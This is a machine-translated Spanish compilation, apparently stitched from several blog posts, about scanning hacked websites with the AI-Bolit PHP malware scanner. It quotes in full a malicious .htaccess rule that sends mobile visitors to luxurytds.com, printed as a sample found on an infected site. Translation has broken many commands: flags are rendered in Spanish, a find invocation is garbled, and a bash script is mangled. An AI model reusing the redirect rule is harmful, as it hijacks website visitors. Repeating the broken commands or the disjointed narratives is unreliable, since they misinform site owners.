Reseñas de Ai Bolit. Cómo trabajar con el escáner AI-BOLIT desde la línea de comando. Cómo funciona el escáner AI-Bolit

La mayor funcionalidad está disponible cuando se ejecuta el escáner AI-BOLIT en modo de línea de comando. Esto se puede hacer tanto en Windows/Unix/Mac OS X como directamente en el alojamiento, si tiene acceso a través de SSH y el alojamiento no limita en gran medida los recursos consumidos del procesador.

Tenga en cuenta que para ejecutar el escáner, se requiere la versión de consola de PHP 7.1 y superior. Las versiones anteriores no son compatibles oficialmente. Verifique la versión actual con php -v

Ayuda con los parámetros de la línea de comando del escáner AI-BOLIT

Mostrar ayuda

php ai-bolit.php --ayuda

php ai-bolit.php --skip=jpg,png,gif,jpeg,JPG,PNG,GIF,bmp,xml,zip,rar,css,avi,mov

Escanear solo ciertas extensiones

php ai-bolit.php --scan=php,php5,pht,phtml,pl,cgi,htaccess,sospechado,tpl

Prepare un archivo de cuarentena para enviarlo a especialistas en seguridad. Se creará un archivo AI-QUARANTINE-XXXX.zip con una contraseña.

php ai-bolit.php --cuarentena

Ejecute el escáner en modo "paranoico" (recomendado para obtener el informe más detallado)

php ai-bolit.php --modo=2

php ai-bolit.php --modo=1

Verifique un archivo "pms.db" en busca de código malicioso

php ai-bolit.php -jpms.db

Ejecute el escáner con un tamaño de memoria de 512 Mb

php ai-bolit.php --memoria=512M

Establezca el tamaño máximo del archivo escaneado en 900 Kb

php ai-bolit.php --tamaño=900K

Pausa 500 ms entre archivos al escanear (para reducir la carga)

php ai-bolit.php --delay=500

Enviar informe de escaneo por correo electrónico [correo electrónico protegido]

php ai-bolit.php [correo electrónico protegido]

Cree un informe en el archivo /home/scanned/report_site1.html

php ai-bolit.php --report=/home/scanned/report_site1.html

Escanee el directorio /home/s/site1/public_html/ (el informe predeterminado se creará allí si no se especifica la opción --report=report_file)

php ai-bolit.php --path=/home/s/site1/public_html/

Ejecute el comando cuando se complete el escaneo.

php ai-bolit.php --cmd="~/postprocess.sh"

Obtenga un informe en texto plano con el nombre site1.txt

php ai-bolit.php -lsite1.txt

Puedes combinar llamadas, por ejemplo,

php ai-bolit.php --size=300K --path=/home/s/site1/public_html/ --mode=2 --scan=php,phtml,pht,php5,pl,cgi,sospechado

Al combinar la llamada del escáner AI-BOLIT con otros comandos de Unix, puede realizar, por ejemplo, un escaneo por lotes de sitios. A continuación se muestra un ejemplo de cómo verificar varios sitios alojados dentro de una cuenta. Por ejemplo, si los sitios están ubicados dentro del directorio /var/www/user1/data/www, entonces el comando para iniciar el escáner será

buscar /var/www/user1/data/www -max Depth 1 -type d -exec php ai-bolit.php --path=() --mode=2 \;

Al agregar el parámetro --report, puede controlar el directorio en el que se generarán los informes de escaneo.

php ai-bolit.php lista de parámetros... --eng

Cambie la interfaz del informe a inglés. Este parámetro debería ser el último.

Integración con otros servicios y en el panel de hosting.

php ai-bolit.php --json_report=/ruta/archivo.json

Generar un informe en formato json

php ai-bolit.php --progress=/ruta/progress.json

Guarde el estado de verificación en un archivo en formato json. Este archivo contendrá datos estructurados en formato json: el archivo de escaneo actual, cuántos archivos se han escaneado, cuántos archivos quedan por escanear, el porcentaje de escaneo, el tiempo hasta que se complete el escaneo. Este mecanismo se puede utilizar para mostrar una barra de progreso y datos sobre los archivos que se están escaneando en el panel. Una vez que se completa el escaneo, el archivo se elimina automáticamente.

php ai-bolit.php --handler=/ruta/hander.php

Manejador de eventos externo. Puede agregar sus propios controladores de inicio/finalización/progreso del análisis/errores del análisis. Se puede ver un archivo de ejemplo en el archivo del escáner, en el directorio tools/handler.php. Por ejemplo, una vez finalizado el escaneo, puede hacer algo con el archivo del informe (enviarlo por correo, archivarlo, etc.).

Hay una situación problemática: un sitio con virus.

Ahora mostraré cómo este virus se puede encontrar y destruir fácilmente. Lo primero que debe hacer es descargar el sitio a la configuración regional; es mucho más fácil verificar una variedad de archivos.

Este texto es de la descripción del vídeo, por lo que es un poco caótico y aburrido. Sin embargo, el resto de mis escritos)

Descargaremos filezilla. Lo descargaré directamente al servidor local instalado, Open Server, para poder ejecutarlo localmente si de repente lo necesito.

Si tiene instalado un antivirus que escanea archivos sobre la marcha, existe la posibilidad de que encuentre virus en algunos archivos incluso durante la descarga. Mira en los registros de mi antivirus.

En mi caso, mi seguridad de Microsoft no mostró nada: desconocía el virus.

Para buscar utilizaré un antivirus especial: Aibolit. Sitio web del desarrollador http://revisium.com/ai/
Te aconsejo que vengas a ver el seminario. Los archivos aún se están descargando, llevará mucho tiempo. Ya tengo lista una copia local, ayer estuve jugando con este antivirus.

Entonces, para trabajar todavía necesitamos php para Windows. Descargue aquí http://windows.php.net/download/ la última versión para Windows en un archivo zip. Desempaque en algún lugar donde se sienta cómodo.

DE ACUERDO. Los preparativos han terminado. Ahora a trabajar.

Descarga el archivo con iBolit.

Hay tres carpetas dentro:

• ai-bolit es el núcleo real del antivirus
• known_files: versiones de bases de datos de archivos antivirus para diferentes motores
• herramientas – utilidad auxiliar.

Entonces, comencemos a tratar el sitio en busca de virus.

1. Copie todos los archivos de la carpeta ai-bolit a la raíz del sitio
2. Si sabemos qué motor tenemos, seleccionamos la carpeta con nuestro CMS en la carpetaknown_files y ponemos todos los archivos en la raíz. En mi caso, el motor de WordPress, luego lo trataremos de virus con bases de datos antivirus para WordPress. Si desea comprobar todo en general, puede completar las bases de datos antivirus de todos los motores; tal vez encuentre algo más)
3. Lo olvidé de nuevo: debes especificar el modo de funcionamiento experto en la configuración de iBolit. Para hacer esto, abra el archivo ai-bolit.php con un editor de texto y busque la línea define('AI_EXPERT', 0); cambie “0” a “1” y listo: el modo experto está activado.
4. Ahora necesitamos descomprimir nuestro archivo zip con php en alguna carpeta donde sea conveniente trabajar con él. Necesitamos un archivo - php.exe
5. Ahora necesitamos ejecutar el archivo ejecutable de nuestro antivirus. Para hacer esto, haga doble clic en ai-bolit.php. Ya tengo la opción de elegir cómo ejecutar este script.

Recomendaría conservar solo la carpeta de cargas y la carpeta de temas. Se descargarán todos los complementos, la configuración permanecerá en la base de datos y los virus no los tocarán. Compruebe manualmente todos los archivos del tema; afortunadamente, no hay muchos allí, a menos que el sitio no haya sido diseñado por un diseñador de diseño torpe. Y rellene todo lo demás en el motor. esta es la forma más confiable.

Y también te recuerdo que lo más probable es que tengas virus en toda tu cuenta de hosting (muy rara vez logran saltar entre las cuentas de diferentes usuarios, solo si el administrador del hosting es una persona corrupta).

Si por alguna razón se elimina iBolit del sitio, siempre puedes descargar mi antivirus para el sitio.

Los virus están tristes (

PD: dos artículos sobre cómo limpiar virus ya encontrados:

• Más sencillo: cómo eliminar usted mismo un virus de un sitio web de forma gratuita
• Para avanzados -

¿Está seguro de que sus sitios no están infectados con virus? ¿Has revisado el sitio con un antivirus en línea? Olvídese, los antivirus en línea nunca podrán encontrar virus insertados en su sitio web por piratas informáticos expertos.

Lo máximo que pueden hacer es identificar scripts maliciosos que usted mismo instaló sin darse cuenta en su sitio web. Por lo tanto, necesitamos métodos más radicales para verificar un sitio en busca de virus, que no puedan simplemente pasar por alto, sino mirar dentro de su proyecto.

¿Cómo comprobar un sitio web en busca de virus de forma gratuita y gratuita?

Este artículo hablará sobre varias formas de comprobar su sitio web en busca de virus:

Los antivirus online son el método más sencillo, pero también el menos fiable.

El antivirus Aibolit es el método más confiable, pero también el más difícil.

sitio web antivirus día del virus - la mejor opción.

Pero primero, un poco sobre por qué el virus en el sitio es peligroso.

¿Cuáles son los peligros del pirateo de sitios web?

Pero primero, un poco de teoría y experiencia personal: me rompieron más de una vez. ¿Por qué un sitio web está infectado con un virus? Una vez que los atacantes obtienen acceso a su sitio, pueden hacer lo siguiente:

Comenzarán a "drenar" su tráfico hacia sus proyectos.
Descargar los contenidos del servidor y base de datos para su venta a terceros.
Reemplazarán la información de contacto o de pago en el sitio web y descargarán los datos personales de los usuarios.
Publicarán puertas con enlaces de spam en su sitio web.
Introducirán virus, troyanos o exploits en las páginas del sitio web, infectando a los visitantes.
Enviarán mensajes de spam desde su servidor.
Venderán el acceso al sitio pirateado a otros atacantes para su posterior entrada no autorizada.

Es importante entender: Los sitios con virus pueden estar sujetos a sanciones. buscadores y perder posiciones. Mi hosting ha sido bombardeado más de una vez por hackers, atacándolo con archivos . ¿Por qué se hace esto? El objetivo es simple: obtener acceso a sus contraseñas o inyectar un virus en su sitio web a través de una vulnerabilidad en el código.

Y lo consiguen, ya que ya he quitado dos veces las puertas que inundaron mis sitios. Pero esto es la mitad del problema, ya que mis sitios fueron infectados después de esto, e incluso cambiar las contraseñas no ayuda mucho. Y simplemente no hay garantías de que no vuelva a suceder.

Luego, cuando ingreso la dirección nuevamente, voy al sitio y también al panel de administración. Cuál es el problema, todavía no lo sé. No existe tal cosa en este sitio, el más reciente. Entonces aún no ha sido objeto de un ataque DDOS...

La forma más sencilla de curar un sitio es demoler todo e instalar el script del sitio nuevamente.. Pero, como comprenderá, se trata de una medida extrema a la que sólo debe recurrirse como último recurso. Y además, se puede insertar código malicioso en la plantilla, pero no se puede reemplazar. Por lo tanto, primero debemos intentar determinar si nuestro sitio está infectado o no. ¿Cómo hacer esto?

¿Dónde comprobar un sitio web en busca de virus en línea?

Verificar un sitio en busca de virus en línea; aunque este método no es el más efectivo, como escribí anteriormente, puedes comenzar con él. Hay buen servicio Alarma antivirus .

Simplemente ingrese la dirección del sitio y espere a que el servicio revise su sitio en busca de virus. Si encuentra algo sospechoso lo publicará en el informe. Pero si ni siquiera este antivirus online encuentra nada, prueba una solución más avanzada.

¿Cómo comprobar si un sitio web tiene virus mediante un script?

Hace apenas una semana revisé todos mis sitios con el antivirus Aibolit y descubrí que mi sitio principal estaba infectado.

¿Qué tipo de antivirus es este y cómo trabajar con él?

Este antivirus se puede descargar desde el sitio web de los desarrolladores: aibolit . Actualmente existe una versión para Windows; anteriormente solo se podía trabajar a través de hosting.

¿Qué puede hacer este antivirus por un sitio web?? Esto es lo que:

- busque virus, scripts maliciosos y de piratas informáticos en el alojamiento: shells basados ​​​​en firmas y patrones flexibles, shells basados ​​​​en heurísticas simples: todo lo que los antivirus y escáneres comunes no pueden encontrar.
— busque scripts vulnerables timthumb, fckeditor, uploadify y muchos otros.
— busque redireccionamientos en .htaccess a sitios maliciosos.
— busque el código de intercambio de enlaces, como sape/trustlink/linkfeed/… en archivos .php
— definir directorios y archivos de entrada.
— busque enlaces vacíos (enlaces invisibles) en las plantillas.
— mostrar directorios abiertos para escritura.
- trabajar con todos los cms sin excepción (joomla, wordpress, drupal, dle, bitrix, phpbb,...)
— enviar un informe por correo electrónico o guardarlo en un archivo.

La instalación es sencilla: descomprime el archivo y sube los archivos ai-bolit.php, .aignore, .aurlignore de la carpeta ai-bolit y un archivo de la carpetaknown_files, que corresponde a la versión de nuestro CMS, en la carpeta con nuestro sitio, en mi caso es .aknown.wp_3_8_1 para wordpress. Es posible que deba configurar los permisos de archivo correctos, 755, por ejemplo.

Bueno, aquellos que tengan el hosting correcto deben iniciar sesión en la terminal (yo tengo Linux, por lo que no se necesitan emuladores) y luego conectarse a nuestro hosting vía SSH.

Ssh INICIAR SESIÓN@DIRECCIÓN_SERVIDOR

No explicaré exactamente cómo hacer esto, si no estás en el tema, entonces necesitas un enfoque individual, escribe en los comentarios, te lo explicaré.

Después de conectarse, debe usar el comando cd para navegar a la carpeta con el sitio. A continuación damos el comando:

PHP ai-bolit.php

Después de esto, comenzará el escaneo, que durará bastante tiempo, dependiendo del tamaño del sitio. Después de terminar, aparecerá un archivo con un nombre aproximado en la carpeta con el sitio. AI-BOLIT-REPORT-07-04-2014_23-10-719945.html

Abrimos el expediente y analizamos qué y cómo. Por ejemplo, al principio obtuve:

Se encontraron firmas de script de Shell. Sospecha de un script malicioso: (12)

Pero en realidad resultó que solo había un virus, y el resto de las detecciones fueron para certificados, que son similares a registros cifrados.

La forma más sencilla de resolver esto es descargar un WordPress limpio, o cualquier otro que tengas, y comparar los archivos sospechosos. Si todo es igual en el original, entonces no hay de qué preocuparse. Bueno, si no, eliminamos el código malicioso. Luego maldije a:

Doble extensión, contenido cifrado o script malicioso sospechoso. Análisis adicional requerido: (14)

El antivirus se quejó de un complemento, TOP 10, no estoy seguro de que haya algún problema. Asimismo, otros peligros eran los falsos positivos.

El análisis heurístico también se quejó de los archivos de Wordpress, pero los verifiqué con los originales y todo estaba bien.

Estos archivos contienen enlaces invisibles. Sospecha de enlace spam:

Aquí tengo un complemento que crea un botón ARRIBA; había un enlace oculto en él.

Aunque en cuanto a los complementos, hay que entender que casi todos tienen enlaces. Pero esto se puede solucionar simplemente cerrando la carpeta de complementos de indexación. En WordPress esto se puede hacer ingresando la línea en robot.txt No permitir: /wp-content/plugins

En cada caso, todo será muy individual, por lo que es difícil escribir algo concreto. El propósito del artículo es más bien brindar orientación.

Aquí todo estaría bien, pero falta una cosa: un seguimiento constante. No ejecutará este antivirus todos los días y los piratas informáticos trabajan los siete días de la semana. Y aquí nos ayudará otro excelente servicio. ¿Cómo comprobar si un sitio web tiene virus utilizando el servicio?

Escaneo automático del sitio en busca de virus

No hace mucho apareció el servicio. día del virus , que puede monitorear constantemente el sitio en busca de virus. Todo se ve muy bonito y funcional; aquí es más conveniente curar sitios web de virus:

Debe agregarles su sitio web y descargar el archivo de sincronización PHP, que se carga en la raíz del sitio. A continuación, puede iniciar la sincronización y el servicio comprobará su sitio en busca de virus.

En la versión gratuita, las posibilidades son limitadas, por lo que si valoras tu sitio web, puedes pagar un poco y estar tranquilo: el servicio buscará virus y los tratará inmediatamente.

Bueno, se descubrió un virus en un sitio web. Este sitio estaba haciendo que mi servidor se cargara hasta que desactivé el protocolo de publicación remota. El problema desapareció, pero el virus permaneció:

Bueno, intentemos eliminar la infección. No, ese no es el caso, el servicio no quiere eliminar el virus de forma gratuita, sólo proporcionó la siguiente información:

Amenazas encontradas: h.Redireccionamiento externo
El archivo de configuración del servidor WEB contiene instrucciones que redirigen condicional o incondicionalmente a los usuarios del sitio a recursos de terceros. Eliminación recomendada.

¿Cómo eliminar un virus que encontré en un sitio web? Intentaré encontrarlo manualmente o tal vez me suscriba a un plan pago, ya que la seguridad del sitio web es muy importante. Aunque lo más probable es que traje esta infección desde un alojamiento compartido, ahora tengo gran VPS y no hubo ningún problema. Entonces, registrarse en Virusday y conecte su sitio.

Aquí le mostramos cómo comprobar su sitio web en busca de virus. Si conoce otras formas, e incluso mejores que éstas, entonces todos estarían interesados ​​en conocerlas...

Ayer tuve un incidente no muy agradable: todos mis sitios estaban infectados. Es bueno que estaba frente a la computadora e inmediatamente noté el problema. ¿Qué pasó?

De repente, uno de mis sitios comenzó a ser transferido a algún tipo de sitio de citas, un sitio indecente, por decirlo suavemente. Cuando entré a mi dominio, fui redirigido inmediatamente a este sitio de spam.

Esta es una situación muy mala, porque si no resuelves el problema de inmediato, podrías ahuyentar a tus visitantes. Y si esto continúa durante mucho tiempo, los motores de búsqueda pueden imponer un filtro en su sitio y perderá todas las posiciones en la búsqueda.

Ya escribí sobre eso, pero en este caso era necesario encontrar el virus rápidamente. Inmediatamente comencé a buscar códigos maliciosos manualmente.

Dado que la redirección provenía de todas las páginas, pensé qué tipo de script estaba incrustado en el encabezado (header.php) o pie de página (footer.php). Pero allí no había ningún código extraño.

Inmediatamente me comuniqué con el soporte de alojamiento:

— Tengo un sitio web como este, comenzó a redirigir a algún recurso indecente, ayúdame a resolver el problema.

Pero antes de que tuvieran tiempo de responderme, yo mismo adiviné dónde más tenía que buscar. En el archivo .htaccess, que se encuentra en la raíz del sitio, encontré el siguiente código:

RewriteEngine en RewriteBase / RewriteCond %(HTTP_USER_AGENT) android|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|pad)|iris|kindle|lge |maemo|meego.+ móvil|midp|mmp|netfront|palm(os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(navegador|enlace)| vodafone|wap|windows (ce|phone)|xda|xiino RewriteCond %(HTTP_USER_AGENT) ^(1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s- )|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di |-m|r |s)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u )|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob |do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze) |fetc|mosca(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p |t)|hei-|hi(pt|ta)|hp(i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu( aw|tc)|i-(20|go|ma)|i230|iac(|-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro |jemu|jigs|kddi|keji|kgt(|/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg(g|/(k|l|u)|50 |54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(di|rc|ri)| mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v)|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1) |10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan( a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt- g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma| mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar| sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v) |sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo |a(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk (40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-|)|webc|whit|wi( g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-) RewriteRule ^$ _http://luxurytds.com/go.php?sid=1 # BULLETPROOF .50.8 >>>>> >> SEGURO.HTACCESS

Tan pronto como lo quité, todo empezó a funcionar como debería. Me tomó 5 minutos hacer todo. Pero si en mi lugar estuviera un completo principiante, entonces le podría llevar mucho tiempo, si es que pudiera encontrar el problema por sí mismo.

Para mi horror, descubrí que todos mis sitios habían sido infectados de manera similar. Inmediatamente solucioné el problema y escribí al soporte de hosting:

Todos mis sitios estaban infectados, lo que significa que todo en su hosting estaba infectado, sería una buena idea advertir a la gente.

A lo que vino la respuesta:

Sólo los archivos de sus sitios fueron "infectados". En consecuencia, algunos de sus sitios tienen vulnerabilidades que se utilizaron para cambiar archivos en su cuenta. Debe ponerse en contacto con un desarrollador web para encontrar y corregir estas vulnerabilidades.

Tal vez sea así, no puedo comprobarlo. Esta no es la primera vez que alguien intenta infectar mis sitios en este hosting. ¿Todos los webmasters tienen estos problemas? ¿O esto es sólo en mi hosting?

Este no es mi primer hosting y nunca he tenido este tipo de problemas en ningún lado. Cada vez me inclino más por cambiar de hosting, por ejemplo para ESTE.

Antes de que tuviera tiempo de resolver este problema, el soporte técnico me escribió que mi otro sitio enviaba spam. Al final resultó que, se cargó un archivo php externo a mi carpeta con un complemento y de alguna manera se envió spam a través de él.

Eliminé este archivo y el problema se resolvió. Ya tengo una impresión clara de que WordPress es lo mismo que Windows, y que hacer al respecto?

Probablemente todos los que crean sitios web encuentran virus y troyanos en ellos. El primer problema es detectar el problema a tiempo, antes de que los proyectos se vuelvan pesimistas para los motores de búsqueda o se conviertan en una carga para el proveedor de alojamiento (en el caso de DDoS, spam).

Este artículo se escribió inmediatamente después de que, durante una copia de seguridad de rutina en una máquina con Windows, el código fuente del sitio web de ESET Smart Security de repente comenzó a maldecir imágenes que consideraba un virus. Resultó que la puerta trasera de FilesMan se cargó en el sitio utilizando las imágenes.

El problema era que el script que permitía a los usuarios subir imágenes al sitio comprobaba que la imagen se cargaba sólo por la extensión del archivo. El contenido no ha sido revisado en absoluto. No es necesario hacer esto;) Como resultado, cualquier archivo PHP podría cargarse en el sitio bajo la apariencia de una imagen. Pero no estamos hablando de agujeros...

La cuestión es que surgió la tarea de comprobar diariamente todos los archivos del sitio en busca de virus y troyanos.

Comprobar un sitio web en busca de virus en línea

Los controles en línea de cualquier sitio web en busca de virus no son en absoluto adecuados para estos fines. Los rastreadores en línea se comportan como un robot de motor de búsqueda y recorren secuencialmente todas las páginas disponibles del sitio. La transición a la siguiente página del sitio se produce a través de enlaces desde otras páginas del sitio. Resp. Si un atacante subió una puerta trasera a su sitio usando una imagen y un enlace a esta imagen no está en ninguna parte de las páginas del sitio y no desfiguró el sitio, como si colgara un virus en las páginas, entonces un análisis de virus en línea del sitio simplemente lo hará. No encontraré esta imagen y no encontraré el virus.

¿Por qué, te preguntarás, un atacante haría esto? ¿Por qué subir una puerta trasera y no hacer nada? Responderé: para spam, para DDoS. Para otra actividad maliciosa que no se refleja de ninguna manera en las páginas del sitio.

En una palabra, comprobar en línea un sitio web en busca de virus es completamente inútil para su total tranquilidad.

Complemento para comprobar un sitio de WordPress en busca de virus y troyanos

Existe un excelente complemento antivirus para WordPress. Se llama. En mi caso, encontró perfectamente imágenes de FilesMan y limpió el sitio de virus. Pero tiene un inconveniente importante. Durante el análisis, supone una carga enorme para el servidor porque simplemente revisa todos los archivos de forma secuencial. Además, la salida de la caja se realiza únicamente de forma manual. No es posible automatizar la verificación del sitio con un complemento.

Bueno, puedes contraer un virus sin usar WordPress, necesitas algo universal.

Comprobar el contenido del sitio con un antivirus habitual

Como se mencionó anteriormente, los problemas fueron descubiertos completamente por accidente por un antivirus de escritorio normal durante una copia de seguridad. Por supuesto, puedes descargar el sitio completo todos los días y comprobarlo con un antivirus habitual. Todo esto es bastante viable.

• En primer lugar, quiero automatización. Para que la verificación sea automática y haya un informe preparado en base a los resultados.
• en segundo lugar, hay sitios en los que descargarlos cada vez simplemente no es realista,

Probando AI-Bolit

Retrasé algo con la introducción. Como resultado de todas las búsquedas, encontré un excelente antivirus GRATUITO para el sitio. . Este antivirus implica diferentes esquemas para su uso. Lo usé a través de ssh.

No he descubierto si se puede utilizar en alojamiento compartido, pero creo que es posible. AI-Bolit está escrito en PHP y se puede iniciar desde un navegador. Por lo tanto, desde un punto de vista puramente técnico, probablemente sea posible en una plataforma compartida.

¡Importante! Aibolit no trata un sitio web en busca de virus, SOLO LOS ENCUENTRA y da un informe de los archivos que considera peligrosos. Y tú mismo decides qué hacer con ellos. Por lo tanto, simplemente presionar estúpidamente un botón y curar el sitio de los troyanos no funcionará.

Cómo utilizar AI-Bolit en VDS con ssh

Aibolit tiene instrucciones y clases magistrales sobre el uso de este antivirus. En general, la secuencia es sencilla:

• descargar
• descomprimir en el servidor (yo descomprimí en /root/ai)
• luego desde la consola ssh ejecute php /root/ai/ai-bolit/ai-bolit.php
• La verificación puede tardar horas, dependiendo del tamaño del sitio.
• Según los resultados de la verificación, se generará un archivo de informe AI-BOLIT-REPORT-<дата>-<время>.html

El archivo del informe mostrará los archivos problemáticos, si los hay.

Carga pesada en el servidor.

El principal problema que encuentra al comprobar automáticamente un sitio web en busca de virus es la carga en el servidor. Todos los antivirus funcionan de la misma manera, buscando secuencialmente todos los archivos disponibles. Y aibolit parece no ser una excepción. Simplemente toma todos los archivos y los revisa uno por uno. La carga salta y esto puede durar mucho tiempo, lo cual no es aceptable en producción.

Pero Aibolit tiene una oportunidad increíble (siempre que tenga un servidor completo o VDS con acceso de root). Primero, para Aibolit, puede generar una lista de archivos para verificar y luego alimentar esta lista. Entonces Aibolit simplemente revisará esta lista.

Para generar una lista, puede utilizar cualquier método de servidor. Terminé con este script bash:

# bash /root/ai/run.sh # https://revisium.com/kb/ai-bolit-console-faq.html DOMINIO="sitio" AI_PATH="/root/ai" AHORA=$(fecha +" %F-%k-%M-%S") # puedes crear una carpeta pública con acceso por contraseña REPORT_PATH="$AI_PATH/reports/$DOMAIN-$NOW.html" SCAN_PATH="/home/azzrael/web/$ DOMINIO/ public_html/" SCAN_DAYS=90 #php /home/admin/ai/ai-bolit/ai-bolit.php --mode=1 --path=$SCAN_PATH --report=$REPORT_PATH # Escanear solo archivos modificados en X días # AI-BOLIT-DOUBLECHECK.php está codificado por AIbolit en --with-2check !!! busque $SCAN_PATH -tipo f -ctime -$SCAN_DAYS > "$AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php" #find $SCAN_PATH -tipo f -nombre "*.ph*" -ctime -$SCAN_DAYS > " $AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php" #find $SCAN_PATH -type f -ctime -$SCAN_DAYS > "$AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php" #find $SCAN_PATH -type f -name "*.ph*" -o -name "*.gif" -ctime -$SCAN_DAYS > "$AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php" php "$AI_PATH/ai-bolit/ai -bolit.php" --mode=1 --report=$REPORT_PATH --with-2check #history -c

# bash /root/ai/run.sh # https://revisium.com/kb/ai-bolit-console-faq.html DOMINIO = "sitio" AI_PATH = "/raíz/ai" AHORA = $(fecha + "%F-%k-%M-%S") # puedes crear una carpeta pública con acceso por contraseña RUTA_INFORME = "$AI_PATH/reports/$DOMAIN-$NOW.html" SCAN_PATH = "/home/azzrael/web/$DOMINIO/public_html/" ESCANEO_DÍAS = 90 #php /home/admin/ai/ai-bolit/ai-bolit.php --mode=1 --path=$SCAN_PATH --report=$REPORT_PATH PHP "$AI_PATH/ai-bolit/ai-bolit.php"-- modo = 1 -- informe = $REPORT_PATH -- con - 2check #historia -c

Aquí puede ver que a través del comando buscar recopilamos todos los archivos creados durante los últimos SCAN_DAYS, los guardamos en la lista AI-BOLIT-DOUBLECHECK.php (por cierto, fue imposible cambiar el nombre del archivo de la lista en el momento de su uso). ), luego envíe esta lista a Aibolit. SCAN_DAYS puede ser igual a un día. Si coloca bash /root/ai/run.sh en el cron diario, es posible que la lista de archivos a analizar no sea muy grande. Resp. la verificación no llevará mucho tiempo y no cargará mucho el servidor.

Recientemente, en uno de mis proyectos, noté que se activaba una redirección a un recurso publicitario de terceros. Esto no es un hack tan obvio del sitio cuando deja de funcionar por completo, sino una forma oculta de robar tráfico. Por ejemplo, un atacante puede redirigir sólo a los usuarios desde dispositivos móviles o hacer que el script se active de forma inconsistente para que el propietario del proyecto no se dé cuenta de la pérdida de audiencia. Sea como fuere, todo esto no es muy bueno para su sitio, tanto desde el punto de vista de los visitantes que no llegan a las páginas correctas, como puede causar problemas a los motores de búsqueda si de repente la redirección va a una fuente con virus. .

Hoy veremos un script PHP útil, AI Bolit, que le permite encontrar virus en su alojamiento para deshacerse de varios códigos maliciosos. La solución es completamente gratuita y no es difícil de usar.

Este script tiene 3 opciones de lanzamiento:

• AI Bolit para Windows: le permite analizar un sitio web localmente después de descargarlo a su computadora.
• Una opción clásica para comprobar el alojamiento en busca de virus (también adecuada para Unix y Mac OS X).
• Nuevo escáner web (ReScan.pro): comprueba las páginas del sitio web en línea.

La última opción, como comprenderá, es la más sencilla, pero no examina directamente los archivos ubicados en el alojamiento, sino que sólo analiza selectivamente algunas páginas web. Una comprobación tan superficial no puede indicarle el origen específico del problema en el sitio, pero le ayudará a detectarlo.

Para algunos usuarios, la opción de script AI Bolit para Windows parece la más familiar y sencilla, porque... Mucha gente trabaja con este sistema operativo. Sin embargo, seguiría recomendando ejecutar un análisis antivirus en su alojamiento. No hay nada complicado aquí y se lo contaré a todos con más detalle a continuación.

Principio de funcionamiento y características de AI Bolit.

Para utilizar AI Bolit debes seguir estos pasos:

• Descargue el script del sitio web del programa.
• Descomprímelo y súbelo a tu hosting.
• Inicie AI Bolit como se indica en la documentación.
• Después de completar la verificación, recibirá el resultado del análisis del sitio.
• Luego podrá solucionar los problemas usted mismo o buscar ayuda de especialistas.

El último punto explica por qué un script PHP tan interesante y potente, AI Bolit, se distribuye de forma gratuita. Creo que después de encontrar problemas y virus en el alojamiento, muchos usuarios recurren a los desarrolladores para obtener más servicios. Un enfoque bastante lógico. La solución, por cierto, está patentada y tiene un algoritmo único, y los sitios populares de alojamiento web la recomiendan/utilizan en su trabajo. Recuerdo que una vez pedí ayuda al soporte técnico del proveedor de alojamiento con respecto a problemas con un sitio web y comenzaron a verificar el alojamiento en busca de virus usando AI Bolit. Después de ese incidente, me enteré de la existencia de esta solución :)

Principales ventajas y características de AI Bolit:

• buscar diferentes tipos de código malicioso: virus, shells, puertas traseras, vulnerabilidades públicas en scripts;
• distribución gratuita;
• uso de análisis heurístico especial patentado;
• instalación y configuración relativamente sencillas;
• base de datos actual de virus y scripts maliciosos;
• comprobar el alojamiento en busca de virus para cualquier sitio web y CMS;
• trabajar con diferentes sistemas operativos: Windows, Unix, MacOS;
• Recomendaciones de las principales empresas de hosting.

Cómo utilizar AI Bolit

1. El script AI Bolit se puede descargar siguiendo este enlace del sitio web con su descripción. Allí se recomienda elegir la versión universal(!) para comprobar si hay virus en su alojamiento. Después de esto, comenzará la descarga automática del archivo ai-bolit.zip.

